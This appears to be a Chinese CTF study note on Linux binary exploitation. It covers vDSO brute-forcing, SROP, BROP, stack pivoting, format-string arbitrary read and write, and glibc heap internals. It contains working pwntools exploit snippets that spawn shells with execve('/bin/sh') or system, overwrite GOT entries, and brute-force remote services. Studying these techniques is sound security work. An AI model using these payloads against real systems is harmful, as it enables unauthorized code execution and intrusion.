爆破或gdb dump出so文件,file为LSB shared object
,IDA查看vdso.so文件
1
2
3
4
5
6
7
8
9
|
.text:00000560 public __kernel_sigreturn
.text:00000560 __kernel_sigreturn proc near ; DATA XREF: LOAD:00000190↑o
.text:00000560 pop eax
.text:00000561 mov eax, 77h ; 'w' // addr1: sigreturn系统调用
.text:00000566 int 80h ; LINUX - sys_sigreturn // addr2: eip设置为int 0x80
.text:00000566 ; } // starts at 55F
.text:00000568 nop
.text:00000569 lea esi, [esi+0]
.text:00000569 __kernel_sigreturn endp ; sp-analysis failed
|
远程爆破vdso脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
RANGE_VDSO = range(0xf7ed0000, 0xf7fd0000, 0x1000)
while(True):
try:
sh = remote('x.x.x.x',x)
vdso_addr = random.choice(RANGE_VDSO)
sh.send(b'a' * (padding) +
p32(elf.symbols['write']) +
p32(0) +
p32(1) + # fd
p32(vdso_addr) + # buf
p32(0x2000) # count
)
result = sh.recvall()
if(len(result) != 0):
open('vdso.so', 'wb').write(result)
sh.close()
log.success("Success")
exit(0)
sh.close()
except Exception as e:
sh.close()
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#!/bin/bash
while true
do
python3 get_vdso.py
str=`file vdso.so`
if [[ $str == *stripped* ]]
then
echo $str
break
else
echo $str
fi
done
|
利用:依靠SROP,每次运行vdso地址随机化,爆破vdso地址再利用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
# 爆破代码
# vdso_range = range(0xf76d9000, 0xf77ce000, 0x1000) # 旧版内核
vdso_range = range(0xf7ed0000, 0xf7fd0000, 0x1000) # 新版内核
def bruteforce():
global p
global vdso_addr
vdso_addr = random.choice(vdso_range)
frame = SigreturnFrame(kernel="i386")
frame.eax = constants.SYS_execve
frame.ebx = bin_sh_addr
frame.eip = vdso_addr + 0x566 # address of int 0x80
frame.esp = bss_addr # 不可为空
frame.ebp = bss_addr # 不可为空
# 确保一下几个段寄存器值正确,Ring0返回Ring3时候会用到,gdb调试p $gs,cs,es,ds,ss等查看
frame.gs = 99
frame.cs = 35
frame.es = 43
frame.ds = 43
frame.ss = 43
ret_addr = vdso_addr + 0x561 # address of sigreturn
payload = flat([cyclic(0x10c+4), ret_addr, frame])
# 判断
p.send(payload)
p.sendline(b'echo pwned')
data = p.recvuntil(b'pwned')
if data != b'pwned':
info('Failed')
return
|
main函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
if __name__ == '__main__':
global p, vdso_addr
i = 1
while True:
print('Try %d' % i)
try:
bruteforce()
except Exception as e:
info('Wrong VDSO')
p.close()
i += 1
continue
info('vdso_addr = ' + hex(vdso_addr))
break
p.interactive()
|
BROP
利用:
- 判断栈溢出长度,【泄露canary、rbp、返回地址】
- 寻找stop_gadget(可以返回main函数的gadget)
- 寻找BROP gadgets(
__libc_csu_init
中的gadgets),定位pop rdi; ret
地址
- 寻找puts或write函数plt,用于泄露其他地址值
- dump plt表来泄露所需函数got地址
- 泄露出got地址,libc执行系统命令getshell
1
2
3
4
5
6
7
8
9
|
# 泄露栈溢出长度
context.log_level='debug'
for i in range(1000):
try:
p.sendline(b'a'*i)
msg = p.recvline(timeout=1)
p.interactive()
except EOFError:
p.close()
|
花式栈溢出
① 无main函数
用IDA静态分析main的地址,在gdb中打该地址断点
栈迁移
Stack Pivoting
- 溢出的距离短覆盖不到返回地址
- 距离短,覆盖了返回地址无法继续构造ROP链
- 需要二次ROP
“pop ebp ret” + “leave ret”
- 覆盖ebp为非法伪造的地址(堆或bss段),覆盖返回地址为
pop ebp; ret
或 leave; ret
的gadget地址
- 执行到
leave
,即 mov esp, ebp; pop ebp
,ebp值给esp,esp+x,先esp和ebp同时指向覆盖后的ebp位置【vuln ebp】
- 接着【vuln ebp】地址
pop
给ebp,此时ebp指向恶意伪造地址
esp+1
后指向返回地址,执行mov esp, ebp
,使esp和ebp同步,栈完成迁移
- 新栈中由read提前读入构建好ROP链,即可完成利用
漏洞点
1
2
|
return read(0, buf, 0x40uLL); // buf [rbp-0x30]
// 实际read时是向rbp-0x30的位置写
|
原理示意
纯栈上栈迁移
32位
buf足够大
1
2
3
4
|
payload = [利用链].ljust(0x100, '\x00') + p32(buf_addr - 4) + p32(leave_ret_addr)
# 利用链
lian = puts@plt + main_addr + puts@got # 泄露libc
lian = system_addr + main_addr + fake_ebp+12 + "/bin/sh\x00"
|
64位
- 有
system
函数plt
,有rop
链,得到ebp
栈地址,无/bin/sh
字符串,需自行输入
- 将栈上rbp覆盖为fake_rbp-0x8,因为leave中mov rsp, rbp后还有pop rbp使得rsp增加
1
2
3
4
5
|
bin_sh_addr = ebp_addr - 0x8
payload2 = 0x8*b'a' + p64(ret_addr) + \\ # ebp位置直接作为返回地址
p64(pop_rdi_addr) + p64(bin_sh_addr) + \\
p64(system_addr) + b'/bin/sh\x00' + \\
p64(ebp_addr-0x30) + p64(leave_ret_addr) \\
|
1
2
|
payload = [利用链].ljust(0x100, '\x00') + p64(buf_addr - 8) + p64(leave_ret_addr)
# 跳转到fake_rbp即buf_addr位置
|
栈空闲地址迁移
32位
1
2
3
4
|
payload = 'a'*padding + p32(stack - 0x500 - 4) + \ # ebp
p32(read_addr) + p32(leave_ret) + \ # 返回地址 + 预留返回地址
p32(0) + p32(stack - 0x500) + p32(0x100) # arg1-3
# 再写入rop链
|
64位
- 调用read函数将rop写入空闲地址(stack-0x1000)处,执行rop
1
2
3
4
5
6
|
payload = 'a'*padding + p64(stack-0x1000-0x8) \\ # rbp -> fake_rbp - 8
+ pop_rdi + p64(0) \\
+ pop_rsi + p64(stack - 0x1000) \\
+ pop_rdx + p64(0x100) \\
+ (libc.sym['read']) + leave_ret_addr
# 再写入rop链
|
bss段上栈迁移
64位
1
2
3
4
5
6
7
|
pwndbg> x/30ga 0x404000 # bss段: 0x404000-0x405000
0x404000: 0x0 0x0
0x404010: 0x0 0x0
0x404020 <stdout@GLIBC_2.2.5>: 0x7f74229e4760 <_IO_2_1_stdout_> 0x0
0x404030 <stdin@GLIBC_2.2.5>: 0x7f74229e3a80 <_IO_2_1_stdin_> 0x0
0x404040 <stderr@GLIBC_2.2.5>: 0x7f74229e4680 <_IO_2_1_stderr_> 0x0
0x404050: 0x0 0x0
|
bss
段上使用偏移0x200
后的地址作为伪造栈
- read函数后使得rbp进入
bss
段中,接着返回read函数前
1
2
3
|
bss_addr = 0x404200
payload1 = b'a'*padding + p64(bss_addr) + p64(main_addr)
# 伪造rbp return address
|
- 由于buf大小0x80,通过read向
rbp-0x80=bss_addr-0x80
读入payload2
- read返回后的指令为
leave;ret;
使得rbp变为bss_addr-0x80
,rsp将leave_ret_addr
pop给rip【ret指令】
- 接着执行返回地址
leave_ret_addr
中的leave;ret;
指令,将rbp变为bss_addr+0x600
后将顺序执行flat中指令
1
2
3
4
5
6
7
8
9
10
11
|
payload2 = flat([
bss_addr + 0x600,
pop_rdi_ret_addr,
elf.got['puts'],
elf.plt['puts'],
main_addr]).ljust(0x80, b'\x00')
\\
+ p64(bss_addr - 0x80) \\ # rbp
+ p64(leave_ret_addr) # return address
io.recv() # 获取puts got表地址从而获取libc基址
|
- 通过read读入payload3,ret2libc getshell
1
2
3
4
5
6
7
|
payload3 = flat([
bss_addr, # 应该可以任意地址
pop_rdi_ret_addr,
libc.search(b'/bin/sh').__next__(),
pop_rdi_ret_addr + 1,
libc.symbols['system']
]).ljust(0x80, b'\x00') + p64(bss + 0x600 - 0x80) + p64(leave_ret_addr)
|
相对地址型栈迁移
漏洞点
1
2
3
4
5
6
7
8
9
10
11
|
void vuln() {
void (*func_ptr)();
read(0, &func_ptr, sizeof(func_ptr)); // 输入gadget 地址
func_ptr(); // 调用函数, 相对rsp偏移一段距离执行buf
}
int main() {
char buf[0x100];
read(0, buf, 0x100); // 可写入rop链 输入'aaaa'
vuln();
}
|
32位
- 若没有足够gadget,可以vuln中继续读入read前push参数地址,跳过一些push
- 此时栈上垃圾数据可作为size参数,极大,可读入更多内容,输入gadget+rop链利用,此时buf可以不管了
- 利用call pop_addr后调整esp,当ret使rip指向system函数,参数为binsh地址
1
2
|
# vul中
payload = p32(pop_addr) + p32(system_addr) + b'aaaa' + p32(binsh_addr)
|
64位
- 输入两段内容在call时查看’aaaa’ buf相对rsp的偏移,可以通过
pop reg; sub rsp, xxx; ret
等gadget来改变rsp
- 最后buf即rop链的开头pop rdi地址等在rsp顶,gadget中ret使得rip指向rsp中内容
1
2
|
payload1 = rop chain # 读入buf
payload2 = p64(pop_addr) # pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
|
SROP
(Sigreturn Oriented Programming),主要为64位中利用,sigreturn是一个系统调用,在unix系统发生signal时会被间接调用,用户层调用,地址保存在栈上,执行后出栈,用户进程上下文保存在栈上,且内核恢复上下文时不校验
- Linux i386下调用sigreturn的代码存放在vdso中
- Linux x86_64通过调用15号syscall调用sigreturn
系统调用指令
1
2
3
4
5
6
|
# 中断:调用者特权级别检查+压栈+跳转
int 0x80
# 无特权级别检查+无压栈+执行快
sysenter # Ring3 进入 Ring0
sysexit # Ring0 返回 Ring3
|
Signal机制
① 中断或异常,内核向进程发送signal,进程挂起进入内核
② 内核为进程保存上下文,跳转到注册好的signal handler处理signal
- 【signal frame入用户空间栈;包含寄存器值和signal信息】
- 【新返回地址入栈,指向**
sigreturn
**系统调用】
③ signal handler返回【调用sigreturn
】
④ 内核为进程恢复上下文,根据signal frame恢复寄存器值和信息,恢复进程执行
signal frame
32位
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
struct sigcontext
{
unsigned short gs, __gsh;
unsigned short fs, __fsh;
unsigned short es, __esh;
unsigned short ds, __dsh;
unsigned long edi;
unsigned long esi;
unsigned long ebp;
unsigned long esp;
unsigned long ebx;
unsigned long edx;
unsigned long ecx;
unsigned long eax;
unsigned long trapno;
unsigned long err;
unsigned long eip;
unsigned short cs, __csh;
unsigned long eflags;
unsigned long esp_at_signal;
unsigned short ss, __ssh;
struct _fpstate * fpstate;
unsigned long oldmask;
unsigned long cr2;
};
|
64位
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
// defined in /usr/include/sys/ucontext.h
/* Userlevel context. */
typedef struct ucontext_t // 入栈的是ucontext_t
{
unsigned long int uc_flags;
struct ucontext_t *uc_link;
stack_t uc_stack; // the stack used by this context
mcontext_t uc_mcontext; // the saved context
sigset_t uc_sigmask;
struct _libc_fpstate __fpregs_mem;
} ucontext_t;
// defined in /usr/include/bits/types/stack_t.h
/* Structure describing a signal stack. */
typedef struct
{
void *ss_sp;
size_t ss_size;
int ss_flags;
} stack_t;
// difined in /usr/include/bits/sigcontext.h
struct sigcontext
{
__uint64_t r8;
__uint64_t r9;
__uint64_t r10;
__uint64_t r11;
__uint64_t r12;
__uint64_t r13;
__uint64_t r14;
__uint64_t r15;
__uint64_t rdi;
__uint64_t rsi;
__uint64_t rbp;
__uint64_t rbx;
__uint64_t rdx;
__uint64_t rax;
__uint64_t rcx;
__uint64_t rsp;
__uint64_t rip;
__uint64_t eflags;
unsigned short cs;
unsigned short gs;
unsigned short fs;
unsigned short __pad0;
__uint64_t err;
__uint64_t trapno;
__uint64_t oldmask;
__uint64_t cr2;
__extension__ union
{
struct _fpstate * fpstate;
__uint64_t __fpstate_word;
};
__uint64_t __reserved1 [8];
};
|
覆盖或伪造该结构使得将伪造数据恢复到寄存器中,即控制所有寄存器,rip控制为syscall地址,控制rax利用syscall; ret;
可任意系统调用,且需要64位中rax=0xf
触发SYS_rt_sigreturn
系统调用,32位中为0x77
使用pwntools构造payload
1
2
3
4
5
6
7
8
9
10
|
# 需已知 bin_sh_addr, syscall_addr, gadget: mov_rax_f_ret[设置rax为0xf再ret]
signal_frame = SigreturnFrame()
signal_frame.rax = 59 # execve
signal_frame.rdi = bin_sh_addr
signal_frame.rsi = 0
signal_frame.rdx = 0
signal_frame.rip = syscall_addr
# 溢出
payload = b'a'*padding + p64(mov_rax_0xf_ret) + p64(syscall_addr) + flat(signal_frame)
|
由于rsp可控,还可利用进行栈迁移,连续多次SROP
格式化字符串
- 格式化字符串函数接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后参数
- 当格式化字符串数量多于变参数量,出现不可预知情况
1
2
|
printf("%#lx %#lx %#lx %#lx %#lx", 1, 2, 3);
// 会依次解析后面的寄存器中的内容 0x1 0x2 0x3 0x7f17717e6f10 0x7f177180c040
|
漏洞点:
1
2
|
read(0, &buf, 0x100uLL); // 标准输入读0x100(256)字节数据到buf
printf((const char *)&buf, &buf); // buf内容以字符串格式打印到标准输出
|
1
2
3
4
|
char buf;
memset(&buf, 0, 0x50u) // 将buf的地址开始的0x50字节的内存区域都设置为0
read(0, &buf, 0x50u);
printf(&buf); // buf可控,格式化字符串漏洞
|
1
2
|
_isoc99_scanf("%ms", &format); //读取一个字符串并动态分配内存
printf(format);
|
语法
基本格式
1
|
%[parameter][flags][field width][.precision][length]type
|
-
parameter
n$
:获取格式化字符串中指定打印参数,显示第n个参数,32位为栈上后第n个地址
-
flags
#
:表示输出时需添加前缀,如十六进制中的0x
width
设置后指定用来作为填充的内容
-
field width
-
.precision
-
length
- 指出浮点型或整型参数输出长度
hh
:整型,输出char
一个字节
h
:整型,输出short
一个双字节
l
:整型,输出long
一个4字节;浮点型,输出double
一个8字节
ll
:整型,输出long long
一个8字节
L
:浮点型,输出long double
一个16字节
z
:整型,输出size_t
一个8字节(64位)
-
type
d/i
:有符号整数,十进制
u
:无符号整数
x/X
:16进制无符号整数,x用小写字母,X用大写字母,指定精度则不足左侧补0
a/A
:16进制double型格式输出栈中变量,当程序开了FORTIFY机制后,程序编译时所有printf函数被替换为__printf_chk函数,使用%a输出栈上方的数据
o
:8进制无符号整数,指定精度则不足左侧补0
s
:输出null结尾的字符串直到精度规定上限,所有字节,将栈中的值以地址进行解析,输出该值(作为指针)指向的字符串内容(存于数据段),若该值不能解析为地址则程序崩溃
c
:将int参数转为unsigned char型输出,单个字符
p
:void *
型,输出对应变量值,printf("%p",a)以地址格式打印a值,printf("%p",&a)打印a所在地址,【地址泄露】
n
:不输出字符,但把前方已经成功输出的字符个数写入对应的整型参数所指变量中;%n
以4字节输入,【任意地址写】
利用
- 劫持程序的控制流:关键变量、Got表[存放延迟绑定之后libc的函数,在libc中的实际的虚拟地址]、返回地址、hook函数、fini_array…
- 地址泄露如PIE,libc,stack等,后在栈上构造地址,利用%n(或%hn,%hhn)实现任意地址写
- main函数调用了foo函数,foo函数存在格式化字符串漏洞
- 且在IDA中可得到需要泄露的目标栈地址与ebp间距离(此处的ebp为main函数的栈底)
- 可劫持foo函数栈帧中的ebp(该ebp指向prev ebp即main函数的ebp)
实际示例
1
2
3
|
printf("%300c%3$hn\n", 'A', 0, &string_len);
//arg1: %300c指定'A'参数输出宽度300
//arg2: %3$hn向参数列表第3个参数string_len地址写入2字节, 将string_len改为0x012c即300
|
32位
1
|
printf("%08x.%08x.%08x"); # 直接栈上找参数,打印出栈上父函数的内容
|
gdb调试结果
64位
%p
输出顺序是:rdi, rsi, rdx, rcx, r8, r9, 栈rsp往rbp
,rdi
可能作为输入的参数,不打印
任意地址读
测试
① 不断调整%后的数,打印出addr的地址形式值,同时保证整个payload是8的倍数,接着修改 p 为 s 和 n 分别进行字符串输出或写入
1
2
3
|
payload = b"abcdefghijk" + b"%22$p" + p64(addr)
payload = 'AAAAAAAABBB%10$s' + p64(0x404050) # 偏移10个输出0x404050地址中的值, s改为n就是写入4字节(0x0000000b)
|
泄露got表地址
1
2
3
4
5
|
# 终端上用于测试 printf(input) 找到输入字符AAAA的偏移
AAAA%p %p %p %p
AAAA0xab 0xcd 0xef 0x41414141 # 此时偏移为4输出
payload = p32(got_addr) + b"%4$s" # 利用 %4 偏移四个输出以该got_addr地址解析的值
|
用户可构造格式化字符串,泄露read的got表地址
1
2
3
4
5
6
|
%n$p # 泄露栈中被视为第n+1个参数的值
%n$s # 泄露栈中被视为第n+1个参数对应地址的内容
addr%k$s\x00 # 获取地址addr对应值(addr为第k个参数): addr输入后也在栈上或寄存器参数中可用k找到
# addr可能较短而使得printf解析被0截断,导致输出失败
[%k$s(padding)][(addr)]
|
任意地址写
32位
1
2
3
4
5
6
7
8
9
|
# 覆盖大数字
# 将大数字拆分多份分别覆盖, 以hhn写入32位数为例
# [addr][addr+1][addr+2][addr+3][pad1]%k$hhn[pad2]%(k+1)$hhn[pad3]%(k+2)$hhn[pad4]%(k+3)$hhn
payload = p32(addr) + b'a'*12 + b'$6%n' # 向addr中填入数字16
# 覆盖小数字
# aa%k$n[padding][addr]
# aa%8 栈上占4字节, $naa 栈上占4字节, 所以addr为第 4+4 = 8个参数
payload = b'aa%8$naa' + p32(addr) # 向addr中填入数字2
|
64位
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
# 覆盖大数字 防止0截断addr放后面
# [pad1]%k$hhn[pad2]%(k+1)$hhn[pad3]%(k+2)$hhn[pad4]%(k+3)$hhn[pad][addr][addr+1][addr+2][addr+3]
# 11,12,13是需要调出来的偏移, +0x100是转换为正数
payload = ''
payload += '%{}c%{}$hhn'.format(one_gadget >> 0 & 0xFF, 11)
payload += '%{}c%{}$hhn'.format(((one_gadget >> 8 & 0xFF) - (one_gadget >> 0 & 0xFF) + 0x100) & 0xFF, 12)
payload += '%{}c%{}$hhn'.format(((one_gadget >> 16 & 0xFF) - (one_gadget >> 8 & 0xFF) + 0x100) & 0xFF, 13)
payload = payload.ljust((len(payload) + 7) / 8 * 8)
payload += p64(exit_hook)
payload += p64(exit_hook + 1)
payload += p64(exit_hook + 2)
# 覆盖小数字
# aa%7$naa为8字节
payload = b'aa%7$naa' + p64(0xdeadbeef) # 向0xdeadbeef写入2
|
下图为向read的got表中写入8
pwntools工具
1
2
3
4
|
fmtstr_payload(offset, {address:data}, nubwritten=0, write_size='byte')
# offset: 格式化字符串偏移:第几个参数
# numbwritten: printf已输出的字符个数
# write_size: 写入方式byte/short/int对应hhn/hn/n
|
全局变量
当存在比较时可判断该变量是否为全局变量(i
),一般在bss段,若是则可以直接获取其地址进行格式化字符串覆盖绕过比较
1
|
.bss:000000000040408C i dd ? ; DATA XREF: main:loc_401404↑r
|
3字节拆分
- 可向栈上写入got表地址,目的:覆盖puts的got表为system
- 注: libc 中两个函数之间最多差 3 字节,若只修改⼀次,只能改 4 字节,此时打印出的字符数可能上亿次,使得内存爆了,所以改两次,第一次改1字节,第二次改2字节
1
2
3
4
|
payload1 = p64(elf.got['puts']) + p64(elf.got['puts'] + 1) # 栈上payload 偏移17, 18
pad = f'%{system & 0xff}c%17$hhn'
pad += f'%{((system >> 8) & 0xffff) - (system & 0xff)}c%18$hn' # %c为叠加, 减去前面累计的值
|
一次改同链2次
- printf解析机制:其遇到第⼀个位置指定的格式化字符串%15$hn,就会把整个格式化字符串中所有位置指定字符⼀起解析
- 格式化字符串改同一条链子两次不能用2次
%$
,需要第一次改用%
,第二次用%$
1
2
3
4
|
pay = '%c'*13 + f"%{(ret_addr&0xffff) - 13}c%hn%{0x10000-(ret_addr&0xffff)}c" # 15->47->9
# (13+2)使得%hn解析第15, %{0x10000-(ret_addr&0xffff)}c: 格式化字符串的 %hn 最多截断16位: 0xffff, 补充输出字符使累积总数达到 0x10000字节来重置字符计数
pay += f'%{backdoor & 0xff}c%47$hhn' # 47->9->backdoor
# 也可pay += '%c'*8 + "%47$hhn" 只更改最后一个字节为8
|
非栈上fmt
栈上相对地址写
printf(buf)
中,buf
为全局变量或malloc在堆上导致不在栈上,不能直接在栈上布置要写入的地址,利用rbp链
1
2
3
4
5
6
7
8
|
# 链: ebp1 9 -> ebp2 37 -> 栈上地址A 每次改只改2字节
payload1 = "%{}c%9$hn".format((stack_addr + offset) & 0xFFFF)
# ebp1 -> ebp2[change] > 栈上地址B
payload2 = "%{}c%37$hn".format(value)
# ebp2 > 栈上地址B[change] > value
# value 传入 target_address >> idx * 16 & 0xFFFF
|
任意地址写
1
2
3
|
# 链: ebp1 -> ebp2 -> 栈上地址A -> value
# 2次栈上相对地址写将A指向目标地址: ebp1 -> ebp2 -> 栈上地址A -> new_value_target_address
# 通过栈上地址A格式化字符串向目标地址写:ebp1 -> ebp2 -> 栈上地址A -> new_value_target_address -> new_value
|
多次利用链
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
# 15 -> 47 -> xxx
rbp 8 0x7fffffffdfe0
9 0x7fffffffdfe8 —▸ 0x4012ba (main+28) ◂— mov eax, 0 # 返回地址, 可选任意链中某个返回地址即可
...
15 0x7fffffffe018 —▸ 0x7fffffffe118 —▸ 0x7fffffffe437 ◂— '/home/pwn' # 利用链
...
47 0x7fffffffe118 —▸ 0x7fffffffe437 ◂— '/home/pwn'
# pwndbg中
pwndbg> fmtarg 0x7fffffffdfe0
The index of format argument : 9 ("\%8$p")
pwndbg> fmtarg 0x7fffffffe018
The index of format argument : 16 ("\%15$p")
pwndbg> fmtarg 0x7fffffffe118
The index of format argument : 48 ("\%47$p")
|
利用过程:(本地环境和远程环境不一样时栈分布不一致,将导致可能本地打通远程打不通)
1
2
3
4
|
payload1 = b'%8$p' # 泄露栈地址 stack = int(io.recv(12), 16) - 0x8, 此为返回地址9
payload2 = f'%{stack & 0xffff}c%15$hn'.encode() # 15->47->? 更改为 15->47->9
payload3 = f'%{backdoor & 0xffff}c%47$hn'.encode() # 47->9->(main+28) 更改为47->9->(backdoor)
# f'%{func & 0xffff}c%number$hn'将func地址作为数值(16位)由%c写入栈中第number个参数指向的地址中
|
当不能泄露栈地址时且开了PIE,更改偏移覆盖返回地址为backdoor有16分之一的可能性爆破成功
1
2
3
4
5
6
7
8
9
10
11
12
|
while True:
try:
p = process()
...
p.sendline("cat flag")
p.recvline_contains('flag', timeout=1)
p.interactive()
except KeyboardInterrupt:
p.close()
exit(0)
except:
p.close()
|
exit hook
/stdlib/exit.c
中原函数
- pwndbg中
u _dl_fini
找到rtld_lock_default_unlock_recursive
,劫持其地址为one_gadget,退出时call one_gadget达到劫持效果
堆溢出漏洞
堆管理器
用户与OS之间作为动态内存管理的中间人,由libc.so.6链接库实现,封装了系统调用(申请内存的 brk
与 mmap
),存在于【shared library即mmap段】
- 响应用户申请内存,向OS申请内存,内核会预先分配很大的连续内存给堆管理器,返回给用户程序,堆空间不足再次与OS交互
- 管理用户释放的内存,适时归还OS,也可响应用户新申请内存请求
系统调用
内存管理函数的系统调用包括 (s)brk、mmap、munmap 函数等
-
__brk(sys_brk)
:
- 堆通过brk向bss段和data数据段扩展【主线程、子线程可用】
- main arena中通过sbrk扩展heap
- 初始堆的起始地址start_brk及堆的当前末尾brk指向同一地址,不开ASLR指向data/bss段结尾,开ASLR指向data/bss结尾的随机偏移处
-
__mmap(sys_mmap_pgoff)
:
- 物理内存/磁盘映射到虚拟内存中,未进行新的申请,在mmap段直接映射获取【子线程可用】
- thread arena中通过mmap分配新heap
- 创建独立的匿名映射段,目的是可以申请以0填充的内存,该内存仅被调用进程所使用
各种堆管理器
- dlmalloc - General purpose allocator
- ptmalloc2 - glibc
- jemalloc - FreeBSD and Firefox
- tcmalloc - Google
- libumem - Solaris
arena
内存分配区,每个线程都单独有一个arena实例管理堆内存区域,用于加速多线程,主分配区和子分配区形成一个环形链表,每个线程中都存在一个私有变量存放分配区指针,分配内存时,未上锁的分配区来分配内存,若全被占用则建立新分配区
- 操作系统 –> 堆管理器 –> 用户
- 物理内存 –> arena –> 可用内存
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
// glibc-2.23
struct malloc_state
{
// glibc-2.27: mutex_t mutex;
__libc_lock_define (, mutex); // 多线程互斥锁,4字节,保证线程安全
int flags; // 标志位,是否有fastbin、内存是否连续
mfastbinptr fastbinsY[NFASTBINS]; /* 存放 fastbin chunk 的数组 80字节 10项 单向连接 */
mchunkptr top; /* 指向Top Chunk堆顶 */
mchunkptr last_remainder;// 上一个chunk分配出一个small chunk给用户后的剩余部分,随后放入unsorted bin中
mchunkptr bins[NBINS * 2 - 2]; /* 存放闲置chunk的数组,包含large/small/unsorted bin 双向链接 */
// #define NBINS 128
/* 记录 bin 是否为空的 位图,chunk被取出后若一个bin空了不立即置0,下一次遍历才重新置0*/
unsigned int binmap[BINMAPSIZE];
// 每一个bit表示对应bin是否存在空闲chunk,4个block管理,每个block 4个字节,共128位
struct malloc_state *next; /* 指向下一个arena的指针,进程内所有arena串成循环单向链表 */
struct malloc_state *next_free;// 指向下一个空闲arena的指针
INTERNAL_SIZE_T attached_threads; // 与该arena相关的线程数
INTERNAL_SIZE_T system_mem; // 记录当前arena在堆区中所分配的内存总大小
INTERNAL_SIZE_T max_system_mem; // 申请释放内存过程中system_mem的峰值
};
typedef struct malloc_state *mstate;
|
1
2
3
4
5
6
|
static struct malloc_state main_arena =
{
.mutex = _LIBC_LOCK_INITIALIZER,
.next = &main_arena,
.attached_threads = 1
};
|
chunk
用户申请内存的基本单位,malloc返回的指针指向一个chunk的数据区域
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
// chunk在glibc中的实现
struct malloc_chunk {
INTERNAL_SIZE_T prev_size; // 前一个空闲chunk的大小,不空闲则存储物理相邻的前chunk的数据
INTERNAL_SIZE_T size; // 本chunk大小
/*
size必须为2*SIZE_SZ(机器字长)整数倍,机器字长:32位4,64位8
假如最低的chunk单位为8字节,大小补齐必须为8的倍数,最低三位只能为0,将该三位作为控制位
*/
struct malloc_chunk* fd; // chunk处于分配状态,fd字段开始是用户数据,chunk空闲时,添加到对应空闲管理链表中
struct malloc_chunk* bk; // fd指向下一个空闲chunk,bk指向上一个空闲chunk, 双向连接
// chunk空闲时,只用于large chunk,双向连接
struct malloc_chunk* fd_nextsize; // fd_nextsize指向前一个与当前chunk大小不同的第一个空闲块,不包含bin的头指针
struct malloc_chunk* bk_nextsize; // bk_nextsize指向后一个与当前chunk大小不同的第一个空闲块,不包含bin的头指针
};
|
- 当其为malloced chunk时,用prev size 和 size 2个字段;若其前的chunk也为malloced chunk时,只用size 1个字段
- 当其为fast bin时,用到prev_size, size, fd 3个字段
- 当其为small bin或unsorted bin时,用到prev_size, size, fd, bk 4个字段
- 当其为large bin时,用到所有6个字段
amd64下最小chunk为32字节(0x20),malloc(0x10)导致申请了0x20的chunk;x86下最小chunk为16字节(0x10)
prev size 0x8 |
size 0x8 |
0x8 ← malloc返回指针 |
0x8 |
prev size复用
标志位(AMP)
- A(NON_MAIN_ARENA):A=0 属于主线程/主分区,A=1 为非主分区分配,不属于主线程
- M(IS_MAPPED):M=1表示使用mmap映射区域,M=0为使用heap区域
- P(PREV_INUSE):P=0 表示pre_chunk空闲可合并,mchunk_prev_size才有效,P=1表示前一个chunk被分配,堆中第一个被分配的内存块的 size 字段的 P 位都会被设置为 1
malloced chunk及free chunk
top chunk
- 本质上是free chunk,向操作系统申请到的内存减去malloc用掉的那一部分后剩余的内存由top chunk管理,物理地址最高
- 其
prev_inuse
位始终为1,否则其前面的chunk会合并到top chunk,
- 当申请的最后一个堆块进行
free
时,将会直接并入top chunk
,通常利用来隔开top chunk
last remainder
用户malloc请求,ptmalloc2分配chunk给用户时内存大小不一致,用户取走后剩余的那一部分
bin
- 管理arena中空闲chunk的结构,以数组形式存在,数组元素为相应大小的chunk链表的链表头,存在于arena的malloc_state中
- small bins,large bins,unsorted bin维护在bins数组中,共127项,每连续两个chunk指针维护一个bin(fd和bk)
- small bins中chunk大小[32~1008],large bins的每个bin中chunk大小在一个范围内
先找fast bins和small bins,然后找unsorted bin,仍找不到则触发unsorted bin遍历,合并分类,再去对应small bins和large bins找,仍找不到则在top chunk中划分一些
Unsorted bin
- 循环双向链表,FIFO,插入的时候插入到 unsorted bin 的头部,取出的时候从链表尾获取,b[1],视为空闲chunk回归其所属bin(small bin和large bin)之前的缓冲区,大于0x80的先进入unsorted bin,chunk大小乱序
- malloc—->遍历时将会进行【sort分类到其他bins中】以及【合并free chunk】,故不能先unsorted bin attack任意地址写后再遍历,因为遍历时会程序崩溃
- 当malloc小于unsorted bin大小的块时,会将unsorted bin中堆块切割后返回,free时靠着top chunk会合并
Fast bins
1
|
fastbin --> third_free_chunk --> second_free_chunk --> first_free_chunk <-- 0x00
|
安全检查
-
size:malloc分配fastbin范围的chunk时,若对应fastbin中有空闲chunk,取出前检查其size
域与对应下标是否一致,不会检查标志位,若否会触发abort
-
double free:在free函数中会对fast bin链表的头结点进行检查,若将被放入fast bin中的chunk与对应下标的链表的头结点为同一chunk会触发abort
-
Safe linking机制(> glibc-2.32):在链表上的chunk 不直接放其所连接的下一个chunk的地址,而是存放下一个chunk地址与【fd指针自身地址右移12位】异或得到的值,使得攻击者得知该chunk地址无法直接利用,
Tcache
- glibc-2.26 (ubuntu 17.10) 后引入,扩大版fastbin,无double free机制,LIFO
- free的chunk小于small bin size时,放入tcache,塞满7个后,大小相同的free chunk进入fastbin或unsorted bin;tcache中chunk不合并
引入2个新结构体:
tcache_entry
:链接空闲chunk,next指针指向下一个大小相同的chunk的user data处,并会复用空闲chunk user data部分
- 此处
next
指向chunk的user data
,而fast bin的fd
指向chunk开头的地址,tcache_entry
会复用空闲chunk的user data
部分
1
2
3
4
|
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;
|
tcache_perthread_struct
:单向链表方式链接了相同大小的空闲free chunk,counts记录空闲chunk数,每条链上最多7个chunk
